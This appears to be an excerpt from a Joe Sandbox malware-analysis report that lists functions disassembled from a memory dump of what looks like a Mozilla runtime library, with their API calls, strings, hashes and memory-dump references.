Instruction ID: 9356c7f180dc2bda35f65a8d28b5186e03e5bb27dc77582a02f6cae669a68ae8
Opcode Fuzzy Hash: 69adda8df0571970f765d69c4344690f4e172047dee26aa59725d7e85ca60431
Instruction Fuzzy Hash: 63418EB55043049FCF20DF24C941A9BBBF1FF89214F44851EE95A93740DB35E885CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6BA52030 Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 204memoryCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,6BA73F47,?,?,?,6BA73F47,6BA71A70,?), ref: 6BA5207F
memset.VCRUNTIME140(?,000000E5,6BA73F47,?,6BA73F47,6BA71A70,?), ref: 6BA520DD
VirtualFree.KERNEL32(00100000,00100000,00004000,?,6BA73F47,6BA71A70,?), ref: 6BA5211A
EnterCriticalSection.KERNEL32(6BADE744,?,6BA73F47,6BA71A70,?), ref: 6BA52145
VirtualAlloc.KERNEL32(?,00100000,00001000,00000004,?,6BA73F47,6BA71A70,?), ref: 6BA521BA
EnterCriticalSection.KERNEL32(6BADE744,?,6BA73F47,6BA71A70,?), ref: 6BA521E0
LeaveCriticalSection.KERNEL32(6BADE744,?,6BA73F47,6BA71A70,?), ref: 6BA52232

Strings

MOZ_RELEASE_ASSERT(node->mArena == this), xrefs: 6BA52253, 6BA52268
MOZ_CRASH(), xrefs: 6BA5227D

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: CriticalSection$EnterVirtual$AllocFreeLeavememcpymemset
String ID: MOZ_CRASH()$MOZ_RELEASE_ASSERT(node->mArena == this)
API String ID: 889484744-884734703
Opcode ID: f1635bba2d5f5023c20112c5fe8739bc594a8ad8b9185a816646538aff30e20b
Instruction ID: b3e24b82462220d6c97d1ad7b6d87c30e2325442307b9cf30a995d976e2c66b4
Opcode Fuzzy Hash: f1635bba2d5f5023c20112c5fe8739bc594a8ad8b9185a816646538aff30e20b
Instruction Fuzzy Hash: 4661E232F0431A9FCF04CE68C985B6E77B2BF85314F194279E524A7684E7789E90CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6BA548E0 Relevance: 13.7, APIs: 9, Instructions: 198COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(8E8DFFFF,?,6BA9483A,?), ref: 6BA54ACB
memcpy.VCRUNTIME140(-00000023,?,8E8DFFFF,?,?,6BA9483A,?), ref: 6BA54AE0
moz_xmalloc.MOZGLUE(FFFE15BF,?,6BA9483A,?), ref: 6BA54A82

Part of subcall function 6BA6CA10: mozalloc_abort.MOZGLUE(?), ref: 6BA6CAA2

memcpy.VCRUNTIME140(-00000023,?,FFFE15BF,?,?,6BA9483A,?), ref: 6BA54A97
moz_xmalloc.MOZGLUE(15D4E801,?,6BA9483A,?), ref: 6BA54A35

Part of subcall function 6BA6CA10: malloc.MOZGLUE(?), ref: 6BA6CA26

memcpy.VCRUNTIME140(-00000023,?,15D4E801,?,?,6BA9483A,?), ref: 6BA54A4A
moz_xmalloc.MOZGLUE(15D4E824,?,6BA9483A,?), ref: 6BA54AF4
moz_xmalloc.MOZGLUE(FFFE15E2,?,6BA9483A,?), ref: 6BA54B10
moz_xmalloc.MOZGLUE(8E8E0022,?,6BA9483A,?), ref: 6BA54B2C

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: moz_xmalloc$memcpy$mallocmozalloc_abort
String ID:
API String ID: 4251373892-0
Opcode ID: 5d8f15a46075c6f23e74a93108e1c775b8c62672de11371df24fb4108a31228e
Instruction ID: 559e990a512a764fb6108e8fa261ba35201e739e81d5e5849dcf68630d189522
Opcode Fuzzy Hash: 5d8f15a46075c6f23e74a93108e1c775b8c62672de11371df24fb4108a31228e
Instruction Fuzzy Hash: C4714AB2900646DFCB54CF79C5819AAB7F5FF18304B104A3ED15ACBA41EB35E6A5CB80

Uniqueness

Uniqueness Score: -1.00%

Function 6BAAAB90 Relevance: 13.6, APIs: 9, Instructions: 135threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6BAAABB4
AcquireSRWLockExclusive.KERNEL32(6BA64A63), ref: 6BAAABC0
ReleaseSRWLockExclusive.KERNEL32 ref: 6BAAAC06
GetCurrentThreadId.KERNEL32 ref: 6BAAAC16
AcquireSRWLockExclusive.KERNEL32(?), ref: 6BAAAC27
ReleaseSRWLockExclusive.KERNEL32 ref: 6BAAAC66
free.MOZGLUE(?), ref: 6BAAAD19
free.MOZGLUE(00000000), ref: 6BAAAD2B
?_Xbad_function_call@std@@YAXXZ.MSVCP140(00000000), ref: 6BAAAD38

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree$Xbad_function_call@std@@
String ID:
API String ID: 2167474191-0
Opcode ID: b41508c1cdcf2f00512aa7c7937b446589a806e731621860f2178028e548b845
Instruction ID: 916a96cf5411f394c6a094ed11665ca529ebdbd6b765f02092e2805116d558aa
Opcode Fuzzy Hash: b41508c1cdcf2f00512aa7c7937b446589a806e731621860f2178028e548b845
Instruction Fuzzy Hash: A5513474600B018FDB24CF25C58875ABBE6FF89714F604A2DD4AA87750EB34F885CB51

Uniqueness

Uniqueness Score: -1.00%

Function 6BAACB30 Relevance: 13.6, APIs: 9, Instructions: 129COMMON

Download Yara Rule

APIs

?_Fiopen@std@@YAPAU_iobuf@@PBDHH@Z.MSVCP140(00000000,00000002,00000040,?,?,6BAABCAE,?,?,6BA9DC2C), ref: 6BAACB52
?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,?,6BAABCAE,?,?,6BA9DC2C), ref: 6BAACB82
??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,?,6BAABCAE,?,?,6BA9DC2C), ref: 6BAACB8D
??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,?,6BAABCAE,?,?,6BA9DC2C), ref: 6BAACBA4
?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,?,6BAABCAE,?,?,6BA9DC2C), ref: 6BAACBC4
?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,?,6BAABCAE,?,?,6BA9DC2C), ref: 6BAACBE9
std::_Facet_Register.LIBCPMT ref: 6BAACBFB
??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,?,6BAABCAE,?,?,6BA9DC2C), ref: 6BAACC20
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,6BAABCAE,?,?,6BA9DC2C), ref: 6BAACC65

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
String ID:
API String ID: 2325513730-0
Opcode ID: 5f6dddcff03c669185e4400db4d1f2c46dbf26ac182fc8e18767c6364642f455
Instruction ID: 5364dc4c3bd0a13eb911f1a819c0608ff322b9dddcacf1f71d5aafff206bfc3f
Opcode Fuzzy Hash: 5f6dddcff03c669185e4400db4d1f2c46dbf26ac182fc8e18767c6364642f455
Instruction Fuzzy Hash: D341C430A003089FDF00DF65CC99A6E77B5EF89310F448069D51A9B391EB39ED82CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6BA5BAE0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 183COMMON

Download Yara Rule

APIs

?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6BA5BC03
?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6BA5BD06

Strings

y, xrefs: 6BA5BC4E
0, xrefs: 6BA5BC74
0, xrefs: 6BA5BBCD

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
String ID: 0$0$y
API String ID: 2811501404-3020536412
Opcode ID: 68e7aa94a22f1a6ba49b85ccd573ba3476b2ea276ead14778af11fdb660a362b
Instruction ID: e02ab4c77900fcdf9626145eaea4ddecddb25a14e8b8b2fd7ebbd5d1387874d1
Opcode Fuzzy Hash: 68e7aa94a22f1a6ba49b85ccd573ba3476b2ea276ead14778af11fdb660a362b
Instruction Fuzzy Hash: 4961D072A083449FCB10CF38C58165BB7E5EF8A344F444B6EF88997251EB38DA95C782

Uniqueness

Uniqueness Score: -1.00%

Function 6BA60A60 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 140COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(0000000C,?,6BABB80C,00000000,?,?,6BA6003B,?), ref: 6BA60A72

Part of subcall function 6BA6CA10: malloc.MOZGLUE(?), ref: 6BA6CA26

moz_xmalloc.MOZGLUE(?,?,6BABB80C,00000000,?,?,6BA6003B,?), ref: 6BA60AF5
free.MOZGLUE(00000000,?,?,6BABB80C,00000000,?,?,6BA6003B,?), ref: 6BA60B9F
free.MOZGLUE(?,?,?,6BABB80C,00000000,?,?,6BA6003B,?), ref: 6BA60BDB
free.MOZGLUE(00000000,?,?,6BABB80C,00000000,?,?,6BA6003B,?), ref: 6BA60BED
mozalloc_abort.MOZGLUE(alloc overflow,?,6BABB80C,00000000,?,?,6BA6003B,?), ref: 6BA60C0A

Strings

alloc overflow, xrefs: 6BA60C05

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: free$moz_xmalloc$mallocmozalloc_abort
String ID: alloc overflow
API String ID: 1471638834-749304246
Opcode ID: 66659d40c2f8159808d0678e2be8b6cc8036c323e4f03420eed54109ba857ffa
Instruction ID: 47ddc0b3812bb0f1a7b7c103bdfbe1311fb816372f70490edb4fef37592ca87d
Opcode Fuzzy Hash: 66659d40c2f8159808d0678e2be8b6cc8036c323e4f03420eed54109ba857ffa
Instruction Fuzzy Hash: A9519EB4A042068FDF24CF68C8C0A6EB3B6FF54388F15896DC85A9B205FB75A5D4CB51

Uniqueness

Uniqueness Score: -1.00%

Function 6BA578C0 Relevance: 12.3, APIs: 8, Instructions: 320COMMON

Download Yara Rule

APIs

free.MOZGLUE(?,6BAD008B), ref: 6BA57B89
free.MOZGLUE(?,6BAD008B), ref: 6BA57BAC

Part of subcall function 6BA578C0: free.MOZGLUE(?,6BAD008B), ref: 6BA57BCF

free.MOZGLUE(?,6BAD008B), ref: 6BA57BF2

Part of subcall function 6BA75E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6BA75EDB
Part of subcall function 6BA75E90: memset.VCRUNTIME140(6BAB7765,000000E5,55CCCCCC), ref: 6BA75F27
Part of subcall function 6BA75E90: LeaveCriticalSection.KERNEL32(?), ref: 6BA75FB2

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: free$CriticalSection$EnterLeavememset
String ID:
API String ID: 3977402767-0
Opcode ID: df4856b1696053a678b5d68cff01b6d85022ee24e68e34945ecf06c773091c8e
Instruction ID: 7ec4303f2573e155c7ffe14e2b5b307601ff031b77def432b01bfc6cb935d786
Opcode Fuzzy Hash: df4856b1696053a678b5d68cff01b6d85022ee24e68e34945ecf06c773091c8e
Instruction Fuzzy Hash: 28C18B73E011288BEF248B28CD90B9DB772AF41314F1582A9D51ABB381D7399FD58F52

Uniqueness

Uniqueness Score: -1.00%

Function 6BAA1220 Relevance: 12.2, APIs: 8, Instructions: 173threadtimeCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6BAA124B
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6BAA1268
GetCurrentThreadId.KERNEL32 ref: 6BAA12DA
InitializeConditionVariable.KERNEL32(?), ref: 6BAA134A
?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(?,?,?), ref: 6BAA138A
?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(00000000,?), ref: 6BAA1431

Part of subcall function 6BA98AC0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6BAB1563), ref: 6BA98BD5

free.MOZGLUE(?), ref: 6BAA145A
free.MOZGLUE(?), ref: 6BAA146C

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: ?profiler_capture_backtrace_into@baseprofiler@mozilla@@Buffer@2@CaptureChunkedCurrentNow@Options@2@@ProfileStackStamp@mozilla@@ThreadTimeV12@_free$ConditionInitializeVariable
String ID:
API String ID: 2803333873-0
Opcode ID: 8c8d45486af43a03eb0b117f1b3a4081e6daa44eabd85a22520db4d46191f45b
Instruction ID: 4e7d8e7b8baccc90b1406d1fac632c0f7677fc79d5a416358b87101f594fb6ce
Opcode Fuzzy Hash: 8c8d45486af43a03eb0b117f1b3a4081e6daa44eabd85a22520db4d46191f45b
Instruction Fuzzy Hash: A361CF75908340ABDF10DF24C990BAAB7F5FFC6308F04891DE99947212EB39E485CB62

Uniqueness

Uniqueness Score: -1.00%

Function 6BA54B50 Relevance: 12.2, APIs: 8, Instructions: 164COMMON

Download Yara Rule

APIs

free.MOZGLUE(?,?,?,6BA54667,?,?,?,?,?,?,?,?,6BA94843,?), ref: 6BA54C63
free.MOZGLUE(?,?,?,6BA54667,?,?,?,?,?,?,?,?,6BA94843,?), ref: 6BA54C89
free.MOZGLUE(?,?,?,6BA54667,?,?,?,?,?,?,?,?,6BA94843,?), ref: 6BA54CAC
free.MOZGLUE(?,?,?,?,?,?,?,6BA94843,?), ref: 6BA54CCF
free.MOZGLUE(?,?,?,?,?,?,?,?,6BA94843,?), ref: 6BA54CF2
free.MOZGLUE(?,?,?,?,?,?,?,?,6BA94843,?), ref: 6BA54D15
free.MOZGLUE(?,?,?,?,?,?,?,?,6BA94843,?), ref: 6BA54D38
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,6BA54667,?,?,?,?,?,?,?,?,6BA94843,?), ref: 6BA54DD1

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: free$_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1497960986-0
Opcode ID: 2d42aafbb58e0ac63e765fe4ab64176af50e951bcc13348ae2a2763c416f97f2
Instruction ID: aeffb1715a7c4d498326af34ec7dfd635e471b6ddc3e214a22be118f29c19043
Opcode Fuzzy Hash: 2d42aafbb58e0ac63e765fe4ab64176af50e951bcc13348ae2a2763c416f97f2
Instruction Fuzzy Hash: 2451A973504A408FEB348A3DD96475677A2AF41728F444A1CE097CBBD5DB39E6F48702

Uniqueness

Uniqueness Score: -1.00%

Function 6BA5E9C0 Relevance: 12.1, APIs: 8, Instructions: 133COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(?,?,?,6BA61999), ref: 6BA5EA39
memcpy.VCRUNTIME140(?,?,7FFFFFFE), ref: 6BA5EA5C
memset.VCRUNTIME140(7FFFFFFE,00000000,?), ref: 6BA5EA76
moz_xmalloc.MOZGLUE(-00000001,?,?,6BA61999), ref: 6BA5EA9D
memcpy.VCRUNTIME140(?,7FFFFFFE,?,?,?,6BA61999), ref: 6BA5EAC2
memset.VCRUNTIME140(?,00000000,00000000,?,?,?,?), ref: 6BA5EADC
free.MOZGLUE(7FFFFFFE,?,?,?,?), ref: 6BA5EB0B
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?), ref: 6BA5EB27

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: memcpymemsetmoz_xmalloc$_invalid_parameter_noinfo_noreturnfree
String ID:
API String ID: 706364981-0
Opcode ID: 86fbd96494229f6b05d5a9576ef1aa9ab72964b02066fbe2b745c6ed804b911a
Instruction ID: 2c0254097c363d0fb66177297a4d79c099ce85a8d3fa2f9e64b0e00703c43934
Opcode Fuzzy Hash: 86fbd96494229f6b05d5a9576ef1aa9ab72964b02066fbe2b745c6ed804b911a
Instruction Fuzzy Hash: 5541E1B2A00215DFDF14CF78DC81AAE77A5FF40224F240628E915D7394E734DA9087E1

Uniqueness

Uniqueness Score: -1.00%

Function 6BAAD310 Relevance: 12.1, APIs: 8, Instructions: 132threadtimeCOMMON

Download Yara Rule

APIs

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6BAAD36B
GetCurrentThreadId.KERNEL32 ref: 6BAAD38A
AcquireSRWLockExclusive.KERNEL32(?), ref: 6BAAD39D
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6BAAD3E1
free.MOZGLUE ref: 6BAAD408

Part of subcall function 6BA8CBE8: GetCurrentProcess.KERNEL32(?,6BA531A7), ref: 6BA8CBF1
Part of subcall function 6BA8CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6BA531A7), ref: 6BA8CBFA

GetCurrentThreadId.KERNEL32 ref: 6BAAD44B
AcquireSRWLockExclusive.KERNEL32(?), ref: 6BAAD457
ReleaseSRWLockExclusive.KERNEL32(?,?), ref: 6BAAD472

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: ExclusiveLock$Current$AcquireProcessReleaseThread$StampTerminateTimeV01@@Value@mozilla@@free
String ID:
API String ID: 3843575911-0
Opcode ID: 8c4bd4a4c50fdc6a312f892e34302a80bfb379eb63f4ff0ed79627f4b74771ff
Instruction ID: 92f908e31b45f7a75168b5fb39cd1ddeb46143e5454c5d28e30a04fedb30ff57
Opcode Fuzzy Hash: 8c4bd4a4c50fdc6a312f892e34302a80bfb379eb63f4ff0ed79627f4b74771ff
Instruction Fuzzy Hash: 4A41EF755043059FCB10DF64C489A9EBBB5FF85314F108A2EE9A287340EB79E985CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6BA69830 Relevance: 10.7, APIs: 7, Instructions: 196COMMON

Download Yara Rule

APIs

free.MOZGLUE(?,?,?,6BAB7ABE), ref: 6BA6985B
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,6BAB7ABE), ref: 6BA698A8
moz_xmalloc.MOZGLUE(00000020), ref: 6BA69909
memcpy.VCRUNTIME140(00000023,?,?), ref: 6BA69918
free.MOZGLUE(?), ref: 6BA69975

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: free$_invalid_parameter_noinfo_noreturnmemcpymoz_xmalloc
String ID:
API String ID: 1281542009-0
Opcode ID: 04d06da5da19a730a4b8b238d21f42946ce669599ec06731e22816fb27be792a
Instruction ID: 8443c97355908e71d9532dfa682c0f8eac2726a6d9ee3a99df72eb6352c80b28
Opcode Fuzzy Hash: 04d06da5da19a730a4b8b238d21f42946ce669599ec06731e22816fb27be792a
Instruction Fuzzy Hash: A7719AB56047058FCB24CF28C58095AB7F1FF4E3647144AA9D85ACB7A1E735F882CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6BA6B790 Relevance: 10.6, APIs: 7, Instructions: 147COMMON

Download Yara Rule

APIs

?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6BAACC83,?,?,?,?,?,?,?,?,?,6BAABCAE,?,?,6BA9DC2C), ref: 6BA6B7E6
?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6BAACC83,?,?,?,?,?,?,?,?,?,6BAABCAE,?,?,6BA9DC2C), ref: 6BA6B80C
?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(?,00000000,?,6BAACC83,?,?,?,?,?,?,?,?,?,6BAABCAE), ref: 6BA6B88E
?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP140(?,6BAACC83,?,?,?,?,?,?,?,?,?,6BAABCAE,?,?,6BA9DC2C), ref: 6BA6B896

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: ?good@ios_base@std@@D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@Osfx@?$basic_ostream@
String ID:
API String ID: 922945588-0
Opcode ID: cef1fc62e79218e9bc6d3e296aeeffa3e9e755c8e6eb2632bd80e0024fb0aaf0
Instruction ID: 0ffba83f323ad053ee85a35eb23440412b55bf95a7ff9e813b3e1e3fb320cdac
Opcode Fuzzy Hash: cef1fc62e79218e9bc6d3e296aeeffa3e9e755c8e6eb2632bd80e0024fb0aaf0
Instruction Fuzzy Hash: 7451BF75B046008FCB25CF58C494A2AB7F1FF8D354B99865DE99A87351D735EC42CB80

Uniqueness

Uniqueness Score: -1.00%

Function 6BA94AD0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 139stringCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,?,80000000,?,6BA94AB7,?,6BA543CF,?,6BA542D2), ref: 6BA94B48
free.MOZGLUE(?,?,?,80000000,?,6BA94AB7,?,6BA543CF,?,6BA542D2), ref: 6BA94B7F
memcpy.VCRUNTIME140(00000000,?,?,80000000,?,6BA94AB7,?,6BA543CF,?,6BA542D2), ref: 6BA94B94
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,6BA94AB7,?,6BA543CF,?,6BA542D2), ref: 6BA94BBC
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,pid:,00000004,?,?,?,6BA94AB7,?,6BA543CF,?,6BA542D2), ref: 6BA94BEE

Strings

pid:, xrefs: 6BA94BE8

Memory Dump Source

